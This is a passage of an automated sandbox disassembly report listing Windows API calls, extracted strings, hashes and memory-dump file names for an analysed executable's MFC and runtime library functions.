                                                              • Instruction ID: 0c2dab92d4de922626cb3a8abf43b640140704faa8201fad17b1bc0ea8ba991f
                                                              • Opcode Fuzzy Hash: d793ba950fb22d410af275c4cc97769c32dde47862a63e26edff83fccff65886
                                                              • Instruction Fuzzy Hash: 9C01C836941B129BCF31AFACD809B5E7FA1BB05711F084017E800AB391EB7459C2CBD2
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: @$@$AfxFrameOrView100su$AfxMDIFrame100su
                                                              • API String ID: 2102423945-2639805938
                                                              • Opcode ID: 70c62069f7b131dd6adddc434e93edad874b1211f465b7546182955801890fd8
                                                              • Instruction ID: 6e5c4257679a3be120f42a618b1e468193b112a207aafb2bfa609046ab96adfd
                                                              • Opcode Fuzzy Hash: 70c62069f7b131dd6adddc434e93edad874b1211f465b7546182955801890fd8
                                                              • Instruction Fuzzy Hash: AD9144B1C002996ADB50DF96D5C5BDEBBF8AF04345F10806AFD08E6281D7788A45D7A4
                                                              APIs
                                                              • FillRect.USER32(?,?,?), ref: 005611F9
                                                                • Part of subcall function 004DDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 004DDC99
                                                              • FillRect.USER32(?,?,?), ref: 0056127E
                                                              • FillRect.USER32(?,?,?), ref: 005612F6
                                                                • Part of subcall function 004E07E6: __EH_prolog3.LIBCMT ref: 004E07ED
                                                                • Part of subcall function 004E07E6: CreateSolidBrush.GDI32(00000000), ref: 004E0808
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FillRect$BrushCreateH_prolog3H_prolog3_catch_Solid
                                                              • String ID: @
                                                              • API String ID: 3782896364-2766056989
                                                              • Opcode ID: 6364da799f5a3513b7782a6f404d737bdb4a3304f4c0299d2cc8e5b0a85ca272
                                                              • Instruction ID: 583b7634aa8f7806d2034296c1d8f36ed8a2436de565be1bf6c78c16f2c34c8d
                                                              • Opcode Fuzzy Hash: 6364da799f5a3513b7782a6f404d737bdb4a3304f4c0299d2cc8e5b0a85ca272
                                                              • Instruction Fuzzy Hash: 05A10371D0021A9FCF08CFA9C9959EEBBB1FF48315F05811AE816BB250D774AA45CFA4
                                                              APIs
                                                              • SetupFindFirstLineW.SETUPAPI(?,?,00000000,0000002C,00622A58,9E026D90,00622A58,00000000), ref: 004D2315
                                                              • SetupFindNextLine.SETUPAPI(0000002C,-00000030), ref: 004D23B0
                                                              • SetupFindNextLine.SETUPAPI(0000002C,-00000030), ref: 004D244A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: FindLineSetup$Next$First
                                                              • String ID: VID_0525$VID_1782
                                                              • API String ID: 1432318419-2521349241
                                                              • Opcode ID: db0aea4e2a2509786f28f1e5bc4fafeddca9bcfccd15b89745ce91efadc3ba4a
                                                              • Instruction ID: 62e08ba450e96a505f622d78809f7f404ebe41ad0219f4f50fccb66b716bf423
                                                              • Opcode Fuzzy Hash: db0aea4e2a2509786f28f1e5bc4fafeddca9bcfccd15b89745ce91efadc3ba4a
                                                              • Instruction Fuzzy Hash: 2281DB71A006069FCB04CF68CDA1AAEB7A1FF65324B14876EE825D73D1DB79A900CB54
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRectVisibleWindow
                                                              • String ID: Dc$c$c
                                                              • API String ID: 3084472430-3725593719
                                                              • Opcode ID: aca9dccd26f999edaddcbb185aaa2e5a25e5d3ca5c0156e9a76e4f9ac31f9649
                                                              • Instruction ID: 689935e61cf02f8e2e55a3f1ddf74a19f36a49d57acb43c56165277024d79020
                                                              • Opcode Fuzzy Hash: aca9dccd26f999edaddcbb185aaa2e5a25e5d3ca5c0156e9a76e4f9ac31f9649
                                                              • Instruction Fuzzy Hash: C2716A71A002069FDB14DF65C889BAE7BF9FF4A710F140069E905EB296DB359C41CBA1
                                                              APIs
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,9E026D90,?,?,?,?,005EADE0,000000FF), ref: 004E4714
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,?,?,?,?,005EADE0,000000FF), ref: 004E4750
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,005EADE0,000000FF), ref: 004E476B
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,00001000,?), ref: 004E47D4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$ClosePrivateProfileString
                                                              • String ID: X*b
                                                              • API String ID: 1042844925-1362717254
                                                              • Opcode ID: 04314f8f073744976dacfb1278bc136d170044a2da215b105cab859d0944949a
                                                              • Instruction ID: e8bad35bfd9ecbd5ae2168a8124a9c1b33f1d91a79ff3e9b2964d3fb3afc34bd
                                                              • Opcode Fuzzy Hash: 04314f8f073744976dacfb1278bc136d170044a2da215b105cab859d0944949a
                                                              • Instruction Fuzzy Hash: 3F418F71D00328DBCB259F15CC4C9AEBBB9EB49314F0001DBF509A2292CB345E99DFA5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: GlobalLock_wcslenlstrlen
                                                              • String ID: FyZ
                                                              • API String ID: 2647411976-4262810165
                                                              • Opcode ID: ee6146d9cf83ade155f1a452b78d81a69ef38d0f362e3a1ddcedd609c84e8a0e
                                                              • Instruction ID: 968d2dc811fcc92569c72c557aabf6e36dfe0c283de7ffa198ac13e1ea92ae46
                                                              • Opcode Fuzzy Hash: ee6146d9cf83ade155f1a452b78d81a69ef38d0f362e3a1ddcedd609c84e8a0e
                                                              • Instruction Fuzzy Hash: A841C371900216EFCB18DF64C8859BEBBB9FF04304F14896AE816E7241DB34AE45CBA0
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004D746A
                                                                • Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85A3
                                                                • Part of subcall function 005E858E: __CxxThrowException@8.LIBCMT ref: 005E85B8
                                                                • Part of subcall function 005E858E: std::exception::exception.LIBCMT ref: 005E85C9
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004D74A7
                                                                • Part of subcall function 005E8541: std::exception::exception.LIBCMT ref: 005E8556
                                                                • Part of subcall function 005E8541: __CxxThrowException@8.LIBCMT ref: 005E856B
                                                                • Part of subcall function 005E8541: std::exception::exception.LIBCMT ref: 005E857C
                                                              • _memmove.LIBCMT ref: 004D7508
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                              • String ID: invalid string position$string too long
                                                              • API String ID: 1615890066-4289949731
                                                              • Opcode ID: f98a71729b1930f7101992a1d270b2ab0a6508941b36833d795cfc379db3f734
                                                              • Instruction ID: e05de3aef1f4cdf83fceb9cc388462b695100005d58492c4de9d2673abbcf126
                                                              • Opcode Fuzzy Hash: f98a71729b1930f7101992a1d270b2ab0a6508941b36833d795cfc379db3f734
                                                              • Instruction Fuzzy Hash: 7C31EB333086105BD7219E5CF860A6EFB99EBA1764F20052FF145CB381EA65DC4087A9
                                                              APIs
                                                              • GetMenuCheckMarkDimensions.USER32 ref: 004DC89E
                                                              • _memset.LIBCMT ref: 004DC916
                                                              • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 004DC978
                                                              • LoadBitmapW.USER32(00000000,00007FE3), ref: 004DC990
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                              • String ID:
                                                              • API String ID: 4271682439-3916222277
                                                              • Opcode ID: c8985dea229ac135af88caa4a1855a692c12203e523672038c5b9facd7b6c492
                                                              • Instruction ID: 6a0861c0b3ed5a25b025c4a33a576d4ea07bd9c6536e762c9eb18f81f470d4c7
                                                              • Opcode Fuzzy Hash: c8985dea229ac135af88caa4a1855a692c12203e523672038c5b9facd7b6c492
                                                              • Instruction Fuzzy Hash: A4312771A002199FEB208F689CD5BB97BB5FB45350F4540ABF549E7381DE388D88DB50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect$CursorState
                                                              • String ID: c
                                                              • API String ID: 2369637639-2927717585
                                                              • Opcode ID: 8e50470ee168e7b37ee8c8529a523d25dddbc879c3d701f3d3629f41011ac895
                                                              • Instruction ID: 1a08b12f7bf0acccf16ba19b3ddf1d8f6bd502f0b4d5d9854f229d70ed56fedc
                                                              • Opcode Fuzzy Hash: 8e50470ee168e7b37ee8c8529a523d25dddbc879c3d701f3d3629f41011ac895
                                                              • Instruction Fuzzy Hash: 1D212C71A0021EABCF11EFA5CC859FEBBBDFB48740B10046AF505E2240DB759A45DBA1
                                                              APIs
                                                                • Part of subcall function 0055C4B3: _memset.LIBCMT ref: 0055C4C4
                                                                • Part of subcall function 0055C4B3: GetParent.USER32(?), ref: 0055C4E4
                                                              • _memset.LIBCMT ref: 0055CC70
                                                              • _memcpy_s.LIBCMT ref: 0055CC86
                                                              • SendMessageW.USER32(?,00000438,00000000,?), ref: 0055CCA2
                                                              • _memcmp.LIBCMT ref: 0055CCB7
                                                                • Part of subcall function 004DACC7: __CxxThrowException@8.LIBCMT ref: 004DACDD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _memset$Exception@8MessageParentSendThrow_memcmp_memcpy_s
                                                              • String ID: Pw`
                                                              • API String ID: 3974188246-3190913483
                                                              • Opcode ID: 87c68ae29e2bf14e95465accba7468afbdd5ed03b5d52f546080775500036fd4
                                                              • Instruction ID: f8764e2c0097931508fa0ba4ba04a6f7ebfa7da7ba9c6a3adff4f6e6c6987f5d
                                                              • Opcode Fuzzy Hash: 87c68ae29e2bf14e95465accba7468afbdd5ed03b5d52f546080775500036fd4
                                                              • Instruction Fuzzy Hash: FD1178B2E00309ABDB10EFE5CC56FAF7778FB45714F10042AB615E7281DA74A905CB54
                                                              APIs
                                                              • IsWindow.USER32(?), ref: 00522391
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 005223CC
                                                              • OffsetRect.USER32(?,?,?), ref: 005223DC
                                                              • CopyRect.USER32(?,?), ref: 005223EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$CopyInfoOffsetParametersSystemWindow
                                                              • String ID: ,
                                                              • API String ID: 401166719-3772416878
                                                              • Opcode ID: 69e1d7352c1bd3861ca4e6c96c6474ad41479649d5815ffabc93075aaee47891
                                                              • Instruction ID: 382a7035606dd1aba2ec5ab0e55bcf303b0ed71044cac6b31253fee3dad75198
                                                              • Opcode Fuzzy Hash: 69e1d7352c1bd3861ca4e6c96c6474ad41479649d5815ffabc93075aaee47891
                                                              • Instruction Fuzzy Hash: 1C214776A00219ABCF14EBE4DC48FAEBBB9FF48310F14042AF101E7190DB74A905CB61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Edit
                                                              • API String ID: 0-554135844
                                                              • Opcode ID: d2596ad5e1fc78b575eddbfd28fdb835c9da566091d65d90ebd0106a50cc8d7d
                                                              • Instruction ID: d52f9c36bbdc6daf4817e0fd6414a7b1972afb81bb55912e839258ab94088ba5
                                                              • Opcode Fuzzy Hash: d2596ad5e1fc78b575eddbfd28fdb835c9da566091d65d90ebd0106a50cc8d7d
                                                              • Instruction Fuzzy Hash: 94118E31204202A7EE2027768C0BB7ABFEEBB50751F244829F915D24E0DF75EC58F654
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(COMCTL32.DLL), ref: 0051466E
                                                              • GetProcAddress.KERNEL32(00000000,TaskDialogIndirect), ref: 0051467E
                                                              • _memset.LIBCMT ref: 00514697
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressException@8H_prolog3HandleModuleProcThrow_memset
                                                              • String ID: COMCTL32.DLL$TaskDialogIndirect
                                                              • API String ID: 2638756577-244319309
                                                              • Opcode ID: 07b448c66a1cc95d7118edf4ec90ce7c2e98141e21fd43d4ea720b527078470a
                                                              • Instruction ID: a22db8295b4b2119d64d9052dd2ea1af0273d2f97b721f37436aa5b9e8dc4936
                                                              • Opcode Fuzzy Hash: 07b448c66a1cc95d7118edf4ec90ce7c2e98141e21fd43d4ea720b527078470a
                                                              • Instruction Fuzzy Hash: 23117372900309ABDB10DBA4CC49FDE7BFCBB45714F104526B505E7180EB74DA84CB95
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004D70DF
                                                              • std::exception::exception.LIBCMT ref: 004D7118
                                                                • Part of subcall function 005CCB3D: std::exception::_Copy_str.LIBCMT ref: 005CCB58
                                                              • __CxxThrowException@8.LIBCMT ref: 004D712D
                                                                • Part of subcall function 005CF7E9: RaiseException.KERNEL32(004DA2E2,?,00000000,?,004DA2E2,?,?,004D106C,00000000), ref: 005CF82B
                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 004D7134
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                                                              • String ID: \*b
                                                              • API String ID: 73090415-1446036122
                                                              • Opcode ID: 89ccd23b2267828aa3e53390bc64c6a93e5887999c6b8a35f60b888ef8b3a5ce
                                                              • Instruction ID: d09af09dd6dd5bf63d07330e5d336db137e1a15b161e757827b547b7aeb00f02
                                                              • Opcode Fuzzy Hash: 89ccd23b2267828aa3e53390bc64c6a93e5887999c6b8a35f60b888ef8b3a5ce
                                                              • Instruction Fuzzy Hash: 8711B2B2804789AFC720DF99C881A9AFFF8FB15300F40866FE55993741D734A604CBA5
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(DWMAPI), ref: 004F0FF0
                                                              • GetProcAddress.KERNEL32(00000000,DwmSetIconicThumbnail), ref: 004F1000
                                                              • DeleteObject.GDI32(00000000), ref: 004F103A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: AddressDeleteHandleModuleObjectProc
